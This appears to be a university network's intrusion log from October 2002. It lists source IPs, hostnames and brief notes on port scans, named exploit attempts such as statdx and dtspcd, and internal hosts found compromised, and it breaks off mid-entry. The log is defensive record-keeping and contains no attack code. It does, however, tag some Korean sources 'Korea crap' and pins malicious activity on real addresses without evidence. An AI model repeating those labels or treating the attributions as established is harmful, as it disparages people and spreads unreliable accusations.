Short summary of some of the attacks against us for Oct. 2002 year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes 2002/10/04-09:04:42.81 61.177.253.63 (CHINANET jiangsu province yancheng city network,CN) scannet for SMB C access 2002/10/04-10:08:08.32 200.222.159.69 (latin america/carribean ??) scannet for SMB C access 2002/10/04-11:42:37.87 80.132.56.119 (p50843877.dip.t-dialin.net) scannet for SMB C access 2002/10/04-12:56:39.42 62.70.42.57 ( ABSnet ISP AS, NO) scannet for SMB C access 2002/10/04-12:57:39.99 209.187.166.88 (C-COR.net,Suwannee GA,US) scannet for port 1433 2002/10/04-13:32:36.18 200.206.182.147 (200-206-182-147.dsl.telesp.net.br) scannet for SMB C access 2002/10/04-14:01:47.01 200.214.83.123 (nrjo03-1123.dial.rjo.embratel.net.br) scannet for SMB C access 2002/10/04-19:56:44.73 211.140.138.12 (China Mobile Communications Corporation,CN) scannet for port 21 2002/10/05-04:02:52.27 210.78.143.171 (263 network group company in china,CN) scannet for port 111 2002/10/05-05:09:12.70 217.136.48.110 (.48-136-217.adsl.skynet.be) scannet for ports 139,445,80 2002/10/05-05:46:55.87 210.78.143.171 (263 network group company in china,CN) probe port 111 on specific machines 2002/10/05-10:14:17.69 141.150.69.195 (client-141-150-69-195.ba-dsg.net) scannet for port 515 2002/10/05-11:09:27.40 218.17.220.25 (SHENZHEN DAQU COMPUTER CO.LTD,CN) scannet for ports 21 2002/10/05-11:38:09.11 148.246.81.109 (Instituto Tecnologico y de Estudios Superiores de Monterrey,MX) scannet for port 1433 2002/10/05-22:20:36.68 209.132.175.147 (dsl1a-147.ccrtc.com) scannet for port 137,139,445 2002/10/06-00:00:52.43 172.182.131.154 (ACB6839A.ipt.aol.com) scannet for port 21 2002/10/06-01:47:25.82 61.252.162.30 (Korea Crap) scannet for port 111 2002/10/06-04:01:55.94 148.243.153.130 (na-148-243-153-130.na.avantel.net.mx) scannet for port 1433 2002/10/06-09:14:35.83 211.156.161.185 (Guangdong Belton Telecommunications Technology Development Co.,Ltd.,CN) scannet port 21 2002/10/06-19:28:49.40 61.177.255.115 (CHINANET jiangsu province yancheng city network,CN) scannet for SMB C access 2002/10/06-20:06:52.51 80.116.76.129 (host129-76.pool80116.interbusiness.it) scannet for port 21 2002/10/06-21:05:14.11 128.6.225.205 (mburton.engr.rutgers.edu) scannet fr port 135 = pound on port 445 on various ips 2002/10/06-23:54:08.35 195.250.107.103 (Zrenjanin City Council,YU) scannet fo rport 1433 2002/10/07-03:04:14.56 213.23.20.159 (dsl-213-023-020-159.arcor-ip.net)scannet for port 57,80 2002/10/07-03:05:49.19 132.203.148.224 (Universite Laval,CA) scannet for port 135 2002/10/07-07:27:03.94 213.4.13.230 (213-4-13-230.uc.nombres.ttd.es) scannet port 1433 2002/10/07-09:23:27.38 200.46.91.197 (197-91-46-200-ip.alianzaviva.net) scannet port 1433 2002/10/07-10:27:14.04 202.159.75.41 (PT. Bhakti Wasantara Net,JAKARTA,ID) scannet - NETBIOS SMB C access 2002/10/07-10:28:03.39 202.159.75.41 () scannet port 139 2002/10/07-10:28:14.77 61.177.247.11 () scannet port 139 2002/10/07-10:30:50.20 195.130.233.59 (janashop2.tiscalinet.it) RPC EXPLOIT statdx attack 2002/10/07-10:31:04.24 195.130.233.59 (janashop2.tiscalinet.it) scannet port 111 2002/10/07-12:41:04.65 12.15.122.67 (c5800-10-bis.p067.btigate.com) scannet - NETBIOS SMB C access 2002/10/07-12:53:36.12 12.15.122.67 (c5800-10-bis.p067.btigate.com) scannet port 139 2002/10/07-17:23:47.25 64.200.239.130 () scannet port 1433 2002/10/07-18:01:15.08 212.175.170.66 () scannet port 443 2002/10/07-18:22:07.98 206.53.3.80 (80-3-53-206.wor.ma.nevd.net) scannet port 1433 2002/10/07-18:43:05.59 65.31.65.131 (rrcs-central-65-31-65-131.biz.rr.com) scannet - NETBIOS SMB C access 2002/10/07-18:43:15.61 65.31.65.131 (rrcs-central-65-31-65-131.biz.rr.com) scannet port 139 2002/10/07-22:13:53.60 61.177.246.50 (CHINANET jiangsu province yancheng city network,CN) scannet - NETBIOS SMB C access 2002/10/07-23:22:31.46 65.94.85.229 (MTL-HSE-ppp165637.qc.sympatico.ca) scannet port 80, 139 2002/10/08-07:57:17.08 61.177.246.82 (CHINANET jiangsu province yancheng city network,CN) scannnet NETBIOS SMB C access 2002/10/08-08:17:42.11 216.64.162.15 (scud.netriver.net-Vancouver WA) scannet for port 1433,1080,5800 2002/10/08-08:20:05.88 65.219.46.94 (cd/City of Ridgecrest,CA,US) scannnet NETBIOS SMB C access 2002/10/08-08:47:52.82 217.97.134.25 (Ergis S.A.,Wabrzezno,PL) scannnet NETBIOS SMB C access 2002/10/08-08:59:37.62 61.177.247.193 (CHINANET jiangsu province yancheng city network,CN) scannnet NETBIOS SMB C access 2002/10/08-09:05:09.96 206.48.144.114 (DIALNET S.A,SANTAGO,CL) scannet for port 1433 2002/10/08-09:14:36.75 200.196.106.4 (UnUSED.linkexpress.com.br) scannnet NETBIOS SMB C access 2002/10/08-09:27:30.84 12.149.217.142 (CONSOLIDATED DELIVERY AN,NY,NY,US) scann net NETBIOS SMB C access 2002/10/08-09:48:18.22 194.230.245.213 (pop-ls-9-5-1-dialup-213.freesurf.ch) scann net NETBIOS SMB C access 2002/10/08-10:46:01.15 61.177.247.45 (CHINANET jiangsu province yancheng city network,CN) scannnet NETBIOS SMB C access 2002/10/08-12:46:58.57 213.99.95.33 (213-99-95-33.uc.nombres.ttd.es) scannnet NETBIOS SMB C access 2002/10/08-12:52:50.50 64.162.6.210 (adsl-64-162-6-210.dsl.sktn01.pacbell.net) scannnet NETBIOS SMB C access 2002/10/08-12:58:45.72 67.202.18.247 (2Cust247.tnt1.kansas-city.mo.da.uu.net) scannnet NETBIOS SMB C access 2002/10/08-13:25:55.74 211.253.87.34 (KWUNIV-HO,KANGWON,KR) scannnet NETBIOS SMB C access 2002/10/08-14:06:37.63 217.195.193.200 (pm3-3-42.dial.teklan.net-TURKEY) scannnet NETBIOS SMB C access 2002/10/08-14:46:50.66 80.198.40.238 (0x50c628ee.albnxx9.adsl-dhcp.tele.dk) scannet ports 6112,443,buff overlfow attack-CDE dtspcd 2002/10/08-14:47:40.62 64.231.55.109 (HSE-Toronto-ppp301049.sympatico.ca) scannnet NETBIOS SMB C access 2002/10/08-14:51:50.42 217.96.165.52 (pl52.luzyckie.sdi.tpnet.pl) scannnet NETBIOS SMB C access 2002/10/08-15:21:02.39 211.62.49.20 (Korea Telecom Hitel Co.,Ltd.,SEOUL,KR) scannet for port 1433 2002/10/08-19:39:37.24 68.81.127.39 (pcp01335924pcs.fairmt01.pa.comcast.net) scannet for port 1433 2002/10/08-19:47:32.97 212.194.15.38 (lns02m-4-38.w.club-internet.fr) scannet for port 21 2002/10/08-20:00:45.86 64.214.150.187 (64-214-150-187.roc.frontiernet.net) scannet for port 445 2002/10/08-20:08:09.81 212.244.181.91 (zsp2ustrzyki.edu.pl) scannet for port 1433 2002/10/08-20:54:44.77 61.177.253.149 (CHINANET jiangsu province yancheng city network,CN) scannnet NETBIOS SMB C access 2002/10/08-21:16:21.92 216.187.81.70 (www.datacrafters.net=Vancouver BC) scannet for port 1433 2002/10/09-00:20:24.48 61.177.255.31 (CHINANET jiangsu province yancheng city network,CN) scannnet NETBIOS SMB C access 2002/10/09-03:10:16.23 62.22.47.10 (Avantis Barcelona Spain) scannet for port 1433 2002/10/09-04:02:01.31 61.177.255.52 (CHINANET jiangsu province yancheng city network,CN) scannnet NETBIOS SMB C access 2002/10/09-06:20:47.76 210.94.133.45 (Korea crap) scannnet NETBIOS SMB C access 2002/10/09-06:26:24.99 61.177.255.41 (CHINANET jiangsu province yancheng city network,CN) scannnet NETBIOS SMB C access 2002/10/09-07:26:54.02 61.177.255.51 (CHINANET jiangsu province yancheng city network,CN) scannnet NETBIOS SMB C access 2002/10/09-08:59:49.58 128.238.129.104 (Polytechnic University,Broklyn,NY,NY) scan net for NETBIOS SMB C access 2002/10/09-09:14:17.08 61.177.255.51 (CHINANET jiangsu province yancheng city network) scan net for NETBIOS SMB C access 2002/10/09-10:04:08.52 200.24.76.13 (El Portal da InternetSA,Bogota, CO) scan net for NETBIOS SMB C access 2002/10/09-11:50:08.45 209.13.207.138 (FOR2ppp-10.uc.infovia.com.ar) scan net for NETBIOS SMB C access 2002/10/09-15:25:12.72 61.177.253.154 (CHINANET jiangsu province yancheng city network) scan net for NETBIOS SMB C access 2002/10/09-15:30:41.56 164.77.219.250 (ENTEL CHILE S.A.,SANTIAGO,CL) scan net for NETBIOS SMB C access 2002/10/09-16:26:19.80 209.212.135.188 (for 188.reverse.hellsouth.com) probe 132.235.4.21 ports 1080,23 2002/10/09-16:34:16.75 217.39.39.155 (host217-39-39-155.in-addr.btopenworld.com) scan net for NETBIOS SMB C access 2002/10/09-17:13:55.48 195.92.254.207 (ppd-com-01.whoc.theplanet.co.uk) scannet for port 1433 2002/10/09-23:18:00.74 164.107.215.115 (rsco-164-107-215-115.resnet.ohio-state.edu) scannet for port 137,445,139 2002/10/10-01:11:18.50 61.177.253.112 (CHINANET jiangsu province yancheng city network) scan net for NETBIOS SMB C access 2002/10/10-07:24:23.21 212.202.170.132 () scannet for port 80 57 51169 21 2002/10/10-08:04:09.80 61.200.136.197 () scannet for port 139 2002/10/10-09:15:03.64 62.45.7.74 () scannet for port 139 2002/10/10-10:02:07.08 200.45.223.81 () scannet for port 139 2002/10/10-10:46:59.29 211.92.141.222 () scannet for port 139 2002/10/10-11:07:48.67 200.60.198.129 () scannet for port 139 2002/10/10-11:13:58.77 61.177.253.112 () scannet for port 139 2002/10/10-11:16:50.83 193.249.19.50 () scannet for port 139 2002/10/10-11:28:51.18 61.145.213.214 () scannet for port 139 2002/10/10-12:15:14.67 194.54.59.77 () scannet for port 139 2002/10/10-13:35:25.10 140.109.227.28 () scannet for port 139 2002/10/10-14:07:40.48 207.30.21.85 () scannet for port 139 2002/10/10-14:26:19.13 65.191.163.117 () scannet for port 139 445 2002/10/10-14:37:20.70 61.38.215.104 () scannet for port 139 2002/10/10-16:04:36.92 130.67.102.214 () scannet for port 139 2002/10/10-16:16:33.28 212.1.153.61 (dial-212-1-153-61.access.uk.tiscali.com) scannet with ICMP superscan echo 2002/10/10-16:17:30.23 212.1.153.61 () scannet for port 139 1433 2002/10/10-18:48:16.59 65.104.67.55 () scannet for port 139 2002/10/10-19:16:34.10 199.243.160.47 () scannet for port 139 2002/10/10-19:21:18.08 200.244.59.28 () scannet for port 139 2002/10/10-20:55:42.36 66.33.0.181 () scannet for port 1080 2002/10/10-21:16:47.13 210.182.17.212 () scannet for port 139 2002/10/10-21:34:57.36 24.156.247.118 () scannet for port 445 2002/10/11-04:16:14.68 65.191.203.161 () scannet for port 1433 2002/10/11-09:03:36.88 61.34.192.246 () scannet for port 139 2002/10/11-09:14:42.87 192.117.198.166 (Bezek-Adsl-vpdn-poolIP-198-166.adsl.israsrv.net.il) hacked 132.235.19.79 & setup ftp server 2002/10/11-09:16:02.67 61.177.253.121 () scannet for port 139 2002/10/11-10:05:28.16 212.171.6.224 () scannet for port 139 2002/10/11-10:15:02.16 24.95.146.111 () scannet for port 139 2002/10/11-11:12:31.36 218.149.22.71 () scannet for port 139 2002/10/11-11:14:03.84 80.9.135.137 () scannet for port 139 2002/10/11-11:14:30.08 200.204.73.70 () scannet for port 139 2002/10/11-12:17:48.55 216.10.178.164 () scannet for port 139 2002/10/11-13:12:48.58 61.230.54.169 () scannet for port 139 2002/10/11-13:26:30.56 132.235.4.24 () scannet for port 139 2002/10/11-14:21:18.09 211.158.6.15 () scannet for port 80 443 2002/10/11-14:44:05.12 200.249.19.250 () scannet for port 139 2002/10/11-15:04:01.18 217.96.218.135 () scannet for port 139 2002/10/11-15:21:32.53 217.0.98.243 () scannet for port 80 57 21 2002/10/11-15:34:17.42 200.207.88.77 () scannet for port 139 2002/10/11-15:36:24.78 63.170.142.3 () scannet for port 139 2002/10/11-15:43:13.29 64.217.135.210 () scannet for port 139 2002/10/11-16:00:41.59 193.82.2.11 () scannet for port 139 445 2002/10/11-16:37:25.44 193.212.165.187 () scannet for port 445 139 2002/10/11-19:15:29.44 208.177.157.114 () scannet for port 21 2002/10/11-21:21:59.52 24.90.190.122 () scannet for port 25 3128 80 8080 1080 2002/10/12-02:40:13.19 211.179.244.139 () scannet for port 1433 2002/10/12-12:07:35.83 148.246.64.35 () scannet for port 79 2002/10/12-16:15:48.80 216.255.44.105 () scannet for port 1433 2002/10/12-16:37:47.77 66.191.8.193 () scannet for port 1433 2002/10/12-17:07:58.28 208.208.208.35 () scannet for port 139 445 2002/10/12-19:18:49.51 217.81.152.223 (pD95198DF.dip.t-dialin.net) hack 132.235.19.193 and setup ftp server 2002/10/12-20:11:32.76 80.56.192.30 () scannet for port 111 445 80 135 1433 21 23 2002/10/12-23:18:22.21 209.86.161.223 () scannet for port 80 445 2002/10/12-23:43:30.32 216.236.151.85 () scannet for port 1433 2002/10/13-01:02:30.95 209.86.161.223 () scannet for port 80 445 2002/10/13-02:21:29.98 80.56.192.30 (f192030.upc-f.chello.nl) scannet with ICMP superscan echo 2002/10/13-11:22:51.91 217.185.187.227 () scannet for port 1433 2002/10/13-11:25:12.77 212.179.97.238 () scannet for port 139 445 80 2002/10/13-16:09:54.03 213.213.142.62 () scannet for port 1433 2002/10/13-17:22:29.34 24.154.166.209 () scannet for port 139 445 80 2002/10/13-17:39:17.72 24.154.166.209 () scannet for port 80 445 139 2002/10/13-17:44:50.22 216.12.213.9 (Everyones Internet, Inc.,TX,US) EXPLOIT CDE dtspcd exploit attempt 2002/10/13-17:44:56.85 216.12.213.9 () scannet for port 1524 6112 2002/10/13-19:45:59.72 213.220.74.47 () scannet for port 22 2002/10/13-21:26:06.24 65.191.200.93 () scannet for port 80 445 139 2002/10/13-22:18:48.10 66.245.35.84 () scannet for port 445 80 139 2002/10/13-22:26:07.69 65.191.200.93 () scannet for port 139 80 445 2002/10/13-22:35:02.31 66.245.35.84 () scannet for port 445 139 2002/10/14-02:45:22.11 203.100.246.116 (dyn116.mel3.homedsl.pacific.net.au) hack 132.235.19.98 2002/10/14-05:45:26.28 12.228.191.48 (12-228-191-48.client.attbi.com) scannet with ICMP superscan echo 2002/10/14-05:45:45.02 12.228.191.48 () scannet for port 1412 2002/10/14-07:27:43.89 24.123.46.10 (rrcs-central-24-123-46-10.biz.rr.com) RPC EXPLOIT statdx on 132.235.4.63 2002/10/14-08:04:00.70 24.123.46.10 () scannet for ports 111 -NETBIOS SMB C access 2002/10/14-08:32:06.68 199.74.164.28 () scannet for ports 1433 2002/10/14-08:33:10.66 213.17.208.153 () scannet for ports 139 -NETBIOS SMB C access 2002/10/14-09:32:17.56218.0.136.2 () scannet for ports 139 -NETBIOS SMB C access 2002/10/14-09:39:19.13 199.174.181.171 () scannet for ports 139 2002/10/14-13:27:12.34 151.199.47.95 () scannet for ports 139 -NETBIOS SMB C access 2002/10/14-15:33:33.44 198.79.20.163 () scannet for ports 139 -NETBIOS SMB C access 2002/10/14-15:53:45.48 207.44.137.241 (Everyones Internet,HOUSTON TX US) send windows popup with add for diploma factory 2002/10/14-17:17:27.35 200.204.197.72 () scannet for ports 139 -NETBIOS SMB C access 2002/10/14-17:23:46.34 63.230.208.51 () scannet for ports 1433 -NETBIOS SMB C access 2002/10/14-19:09:59.50 24.191.91.29 (ool-18bf5b1d.dyn.optonline.net) scan net for ports 445,139,80 - >1500 times /ip 2002/10/14-20:31:19.60 63.170.119.144 () scannet for ports 139 -NETBIOS SMB C access 2002/10/14-20:58:06.51 141.150.69.195 () scannet for ports 515 2002/10/14-22:20:00.57 218.51.183.82 () scannet for ports 139 -NETBIOS SMB C access 2002/10/14-22:42:31.43 64.247.66.56 (dhcp-064-247-066-056.sg1.ohiou.edu) portscan p1 2002/10/14-23:06:25.38 211.230.32.162 () scannet for ports 139 -NETBIOS SMB C access 2002/10/14-23:29:46.81 218.90.34.159 () scannet for ports 139 -NETBIOS SMB C access 2002/10/14-23:47:11.26 200.158.4.225 () scannet for ports 139 -NETBIOS SMB C access 2002/10/14-23:47:20.75 216.68.15.165 () scannet for ports 139 -NETBIOS SMB C access 2002/10/15-03:45:09.54 203.241.249.137 () scannet for ports 139 -NETBIOS SMB C access 2002/10/15-04:11:58.43 217.126.101.155 () scannet for ports 139 -NETBIOS SMB C access 2002/10/15-04:38:19.59 132.235.17.239 (andouille.ent.ohiou.edu) running an xdcc server for several days now.... 2002/10/15-06:08:50.59 211.130.239.153 () scannet for ports 139 -NETBIOS SMB C access 2002/10/15-06:42:46.96 62.248.2.173 () scannet for ports 139 -NETBIOS SMB C access 2002/10/15-08:12:52.75 212.69.224.89 (ids.vital.co.uk) scannet for port(s) 443 80 2002/10/15-10:26:29.28 213.84.3.96 (a213-84-3-96.adsl.xs4all.nl) scannet for port(s) 443 80 2002/10/15-10:58:08.61 200.223.23.23 (ppp18.provyder.com.br) scannet for ports 139 -NETBIOS SMB C access 2002/10/15-10:58:33.08 200.223.23.23 (ppp18.provyder.com.br) scannet for port(s) 139 2002/10/15-11:34:12.75 200.168.19.86 (200-168-19-86.dsl.telesp.net.br) scannet for ports 139 -NETBIOS SMB C access 2002/10/15-11:34:16.99 200.168.19.86 (200-168-19-86.dsl.telesp.net.br) scannet for port(s) 139 2002/10/15-12:14:14.30 62.11.129.74 (ppp-62-11-129-74.dialup.tiscali.it) scannet for port(s) 1433 2002/10/15-12:39:14.51 213.154.70.146 () scannet for port(s) 80 443 2002/10/15-13:41:19.53 200.68.173.93 (cr2006817393.cable.net.co) scannet for ports 139 -NETBIOS SMB C access 2002/10/15-13:41:24.71 200.68.173.93 (cr2006817393.cable.net.co) scannet for port(s) 139 2002/10/15-14:15:02.08 200.55.9.250 (Inst.Mov.de F.coop,BuenosAris, AR) scannet for ports 139 -NETBIOS SMB C access 2002/10/15-14:15:09.23 200.55.9.250 () scannet for port(s) 139 2002/10/15-14:40:27.43 199.247.235.216 () scannet for port(s) 1433 2002/10/15-15:08:27.53 202.108.254.200 (CHINANET Beijing province networkm,CN) scannet for port 1080 2002/10/15-15:35:55.66 216.177.177.158 (ip-216-177-177-158.dynamic-cpe.cable.gvtc.com) ICMP superscan echo of net 2002/10/15-15:40:09.25 216.177.177.158 (ip-216-177-177-158.dynamic-cpe.cable.gvtc.com) scannet for port(s) 139 80 445 2002/10/15-15:43:27.41 208.179.252.25 (25-252-179-208.pajo.com) scannet for ports 139 -NETBIOS SMB C access 2002/10/15-15:43:51.98 208.179.252.25 (25-252-179-208.pajo.com) scannet for port(s) 139 2002/10/15-16:24:18.39 148.245.171.231 (na-171-231.na.avantel.net.mx) scannet for ports 139 -NETBIOS SMB C access 2002/10/15-16:25:55.45 148.245.171.231 (na-171-231.na.avantel.net.mx) scannet for port(s) 139 2002/10/15-16:45:10.85 24.29.151.147 (24-29-151-147.nyc.rr.com) scannet for port(s) 80 2002/10/15-17:14:55.05 213.169.172.224 (ip-172-224.evhr.net) scannet for port(s) 21 2002/10/15-18:17:36.89 209.212.135.188 (188.reverse.hellsouth.com)scannet for port 1080 2002/10/15-18:30:19.66 195.232.62.18 (fra-tgn-ozd-vty18.as.wcom.net) scannet for port(s) 21 2002/10/15-20:01:45.50 62.243.188.160 (0x3ef3bca0.kd4nxx6.adsl-dhcp.tele.dk) scannet for ports 139 -NETBIOS SMB C access 2002/10/15-21:39:23.24 66.30.34.248 (amak.ne.client2.attbi.com) scannet for port(s) 445 2002/10/15-21:43:44.55 212.67.212.103 () scannet for port(s) 22 2002/10/15-22:13:50.47 216.85.178.226 (e.spire Communications, Inc.,STERLING,VA,US) probe port 139 on 132.235.4.65 -NETBIOS SMB C access 2002/10/15-22:41:18.84 210.243.184.155 (h155-210-243-184.seed.net.tw) probe port 139on 132.235.4.65 -NETBIOS SMB C access 2002/10/15-22:47:08.53 61.77.84.229 (KYONGGI,KR) probe port 139 on 132.235.4.65 -NETBIOS SMB C access 2002/10/15-22:51:54.15 217.230.116.43 (pD9E6742B.dip.t-dialin.net) scannet for port(s) 80 21 57 2002/10/16-00:22:32.79 208.61.88.232 (adsl-61-88-232.mia.bellsouth.neT) SCannet for port(s) 1369 ports 2002/10/16-00:34:04.12 208.61.88.232 (adsl-61-88-232.mia.bellsouth.net) ICMP superscan echo of net 2002/10/16-01:04:56.73 212.160.157.121 (Huta Minska,PL) scannet for port 8080 2002/10/16-01:05:02.00 212.160.157.121 () scannet for port(s) 8080 2002/10/16-02:24:27.41 213.25.233.182 (pa182.kalisz.sdi.tpnet.pl) scannet for port(s) 80 443 2002/10/16-03:36:58.25 67.227.10.138 (1Cust138.tnt1.san-fernando.ca.da.uu.net) ICMP superscan echo of net 2002/10/16-03:37:11.02 67.227.10.138 (1Cust138.tnt1.san-fernando.ca.da.uu.net) scannet for port(s) 25 2002/10/16-04:09:00.47 195.102.66.109 (host12.ngcardoch.u-net.com) scannet for port(s) 139 2002/10/16-04:19:56.66 212.191.4.17 (stacja17.swseiz.lodz.pl) scannet for port(s) 139 2002/10/16-07:17:49.73 193.127.14.36 () scannet for port(s) 1433 2002/10/16-13:27:47.23 61.61.121.208 () scannet for port139 NETBIOS SMB C access 2002/10/16-13:47:45.01 213.97.224.4 () scannet for port139 NETBIOS SMB C access 2002/10/16-13:48:38.52 209.90.142.20 () scannet for port139 NETBIOS SMB C access 2002/10/16-14:26:19.87 24.232.193.169 () scannet for port139 NETBIOS SMB C access 2002/10/16-14:42:02.98 210.111.114.6 () scannet for port139 NETBIOS SMB C access 2002/10/16-15:09:23.20 217.209.209.110 (h110n2fls32o804.telia.com) 1. portscan all ips on net, then probe multiptle ports 2002/10/16-15:09:23.20 217.209.209.110 (h110n2fls32o804.telia.com) 2. (try to login as root via ftp, etc) 2002/10/16-23:36:06.73 146.115.5.131 () scannet for port 445 135 2002/10/16-23:37:10.10 146.115.5.133() scannet for port 445 2002/10/17-01:37:38.43 140.140.1.8 () scannet for port139 2002/10/17-10:38:09.48 194.79.172.139 (FUTURE SOFT,FRANCE) scannet for port 443 2002/10/17-21:06:03.86 211.217.158.218 (Korea Telecom,SEOUL,KR) attack 132.235.4.18 vi MS ports 2002/10/18-03:36:37.47 217.209.209.110 (h110n2fls32o804.telia.com) 1. portscan MULTIPLE ips, multiple attacsk on ftp,finger. etc. 2002/10/18-03:36:37.47 217.209.209.110 (h110n2fls32o804.telia.com) 2. DNS version probe, ETC until 09:41:20.32 2002/10/18-04:09:06.54 142.179.168.151 (aji251m1y52aa.ab.hsia.telus.net) scannet for port 139 2002/10/18-08:39:02.43 217.209.209.110() scannet for ports 161 ports 2002/10/18-09:02:54.43 205.151.64.15 () scannet for ports 139 2002/10/18-10:15:09.07 65.189.150.133 (dsl-65-189-150-133.telocity.com) attack 132.235.4.202 via MS ports thru 10:44 2002/10/18-10:30:46.76 65.40.197.208 (user208.net512.nj.sprint-hsd.net) multple probes to 132.235.1.7 ports 5280 5281 2002/10/18-11:46:28.01 148.235.82.181 () scannet for ports 139 2002/10/18-11:59:55.29 68.32.75.172 () scannet for ports 80 2002/10/18-12:56:25.22 24.245.9.6 () scannet for ports 1433 2002/10/18-13:08:27.65 151.26.89.25 () scannet for ports 139 2002/10/18-14:24:03.67 143.248.8.22 () scannet for ports 139 445 2002/10/18-14:26:59.55 80.135.164.32 () scannet for ports 139 2002/10/18-14:31:58.30 65.189.150.133 (dsl-65-189-150-133.telocity.com) attack 132.235.4.7 via MS ports thru 14:59:50. 2002/10/18-14:48:26.72 24.208.183.130 () scannet for ports 20 ports 2002/10/18-14:50:16.34 143.248.8.109 () scannet for ports 139 445 2002/10/18-15:26:22.32 200.243.63.195 () scannet for ports 139 2002/10/18-15:56:43.14 143.248.68.184 () scannet for ports 139 445 2002/10/18-16:41:25.30 143.248.138.160() scannet for ports 139 445 2002/10/18-17:01:56.56 81.48.69.127 () scannet for ports 139 135 445 2002/10/18-18:12:55.37 152.7.25.209 () scannet for ports 445 2002/10/18-18:33:19.71 130.91.29.212 () scannet for ports 1433 2002/10/18-21:08:29.99 66.108.184.106 () scannet for ports 445 2002/10/18-22:09:36.42 24.185.60.177 () scannet for ports 445 2002/10/18-22:55:46.43 24.192.11.49 () scannet for ports 445 2002/10/19-00:41:32.89 207.32.140.31 () scannet for ports 445 139 2002/10/19-00:42:02.88 207.32.140.120 () scannet for ports 445 2002/10/19-00:42:20.17 207.32.140.228 () scannet for ports 445 139 2002/10/19-00:48:24.35 143.248.206.176() scannet for ports 139 445 2002/10/19-01:03:14.52 24.188.7.217 () scannet for ports 445 2002/10/19-01:20:42.22 212.254.136.112() scannet for ports 57 2002/10/19-02:40:49.02 207.153.26.65 () scannet for ports 139 2002/10/19-02:57:49.70 130.39.45.236 () scannet for ports 139 445 2002/10/19-03:40:56.21 12.218.240.113 (12-218-240-113.client.mchsi.com) 1. portscan multiple IPs - ports 80 445 3128 3389 6588 7616 2002/10/19-03:40:56.21 12.218.240.113 (12-218-240-113.client.mchsi.com) 2. 8000 9076 9088 , icmp echo scan 2002/10/19-03:41:18.42 12.218.240.113 (12-218-240-113.client.mchsi.com) ICMP superscan echo of net 2002/10/19-03:42:06.34 12.218.240.113 () scannet for ports 3128 445 80 3389 9088 etc 2002/10/19-05:18:11.58 61.221.104.33 () scannet for ports 80 2002/10/19-05:53:27.37 168.191.184.172() scannet for ports 4480 8080 3128 6588 1080 80 2002/10/19-06:22:53.42 65.25.76.167 () scannet for ports 445 139 80 2002/10/19-06:32:29.80 129.219.144.21 (astro.la.asu.edu) attack 132.235.4.201:139 to get ADMIN$ C$ D$ access 2002/10/19-06:50:22.20 80.129.61.88 (p50813D58.dip.t-dialin.net) ICMP echo scan of net 2002/10/19-06:52:11.56 212.199.253.38 (IL-GOLDENLINES,IL) run ftp server on 132.235.19.98 via microsoft sql security hole 2002/10/19-08:35:43.32 211.238.207.36 (ACETECH,SEOUL,KR) scan net with RPC portmap request status 2002/10/19-08:36:01.84 211.238.207.36 () scannet for ports 111 2002/10/19-08:40:17.59 64.214.150.187 () scannet for ports 445 2002/10/19-08:40:21.91 66.119.34.39 () scannet for ports 80 2002/10/19-09:27:37.44 150.67.48.116 () scannet for ports 80 21 57 2002/10/19-10:48:40.40 140.109.40.233 () scannet for ports 139 445 2002/10/19-10:59:10.55 129.170.43.228 () scannet for ports 445 139 2002/10/19-12:37:36.27 24.191.18.199 () scannet for ports 445 139 2002/10/19-12:52:50.18 24.188.236.230 () scannet for ports 445 2002/10/19-12:53:27.83 64.251.82.200 () scannet for ports 445 139 2002/10/19-12:59:33.80 62.5.147.241 () scannet for ports 80 2002/10/19-14:37:04.35 208.171.232.229() scannet for ports 1433 2002/10/19-14:40:54.94 24.93.102.1 () scannet for ports 31 ports 2002/10/19-14:47:50.27 66.147.217.179 () scannet for ports 80 2002/10/19-16:05:50.43 12.226.44.67 () scannet for ports 445 2002/10/19-16:07:49.13 12.231.168.197 () scannet for ports 445 2002/10/19-16:48:28.88 131.210.4.168 () scannet for ports 1433 2002/10/19-17:07:56.22 24.192.183.153 () scannet for ports 445 2002/10/19-20:21:33.76 24.45.35.37 () scannet for ports 445 139 2002/10/19-20:25:41.20 64.162.177.195 () scannet for ports 139 445 80 2002/10/19-20:38:09.13 195.218.191.115() scannet for ports 80 2002/10/19-20:39:14.17 143.248.203.219() scannet for ports 445 139 2002/10/19-21:11:20.11 194.151.97.66 () scannet for ports 139 2002/10/19-21:15:41.63 24.192.29.43 () scannet for ports 445 2002/10/19-21:17:22.39 24.189.92.178 () scannet for ports 445 139 2002/10/19-21:27:04.06 24.191.92.216 () scannet for ports 445 139 2002/10/19-21:49:27.48 143.248.150.2 () scannet for ports 445 2002/10/19-21:54:29.59 24.191.161.9 () scannet for ports 139 445 2002/10/19-22:32:01.13 80.135.248.224 () scannet for ports 443 80 2002/10/19-22:36:14.53 131.94.143.75 () scannet for ports 445 2002/10/19-22:40:48.24 24.208.176.251 () scannet for ports 33 ports 2002/10/19-22:56:19.00 130.17.2.3 () scannet for ports 443 2002/10/19-23:18:22.38 140.109.225.2 () scannet for ports 139 445 2002/10/19-23:49:59.11 165.123.149.142() scannet for ports 445 139 2002/10/19-23:53:39.33 80.129.113.136 () scannet for ports 21 2002/10/20-00:10:46.63 24.192.1.244 () scannet for ports 445 2002/10/20-00:21:33.66 143.248.125.61 () scannet for ports 139 445 2002/10/20-00:28:37.11 64.251.243.44 () scannet for ports 445 139 2002/10/20-02:38:26.72 129.107.70.8 () scannet for ports 80 2002/10/20-03:40:35.65 143.248.125.26 () scannet for ports 139 445 2002/10/20-03:47:10.59 143.248.125.26 () scannet for ports 445 139 2002/10/20-03:47:20.34 147.32.32.180 () scannet for ports 80 2002/10/20-07:17:15.48 213.245.220.230() scannet for ports 21 2002/10/20-07:48:26.10 24.208.180.47 () scannet for ports 7 ports 2002/10/20-08:07:12.23 211.72.1.133 () scannet for ports 139 445 2002/10/20-08:51:26.91 24.187.245.92 () scannet for ports 139 445 2002/10/20-08:55:49.21 165.132.177.45 () scannet for ports 445 2002/10/20-08:59:28.62 141.223.203.161() scannet for ports 445 2002/10/20-09:03:07.10 213.64.67.243 () scannet for ports 80 2002/10/20-09:10:42.71 217.209.209.110() scannet for ports 445 139 multiple ports 2002/10/20-09:21:40.25 24.189.52.107 () scannet for ports 445 2002/10/20-09:26:28.55 4.60.135.173 () scannet for ports 445 2002/10/20-09:33:22.41 24.184.195.14 () scannet for ports 445 2002/10/20-09:37:21.71 24.47.99.179 () scannet for ports 139 445 2002/10/20-09:44:43.19 218.234.13.70 () scannet for ports 445 2002/10/20-09:59:58.62 208.62.70.14 () scannet for ports 139 445 2002/10/20-10:08:28.29 211.72.123.118 () scannet for 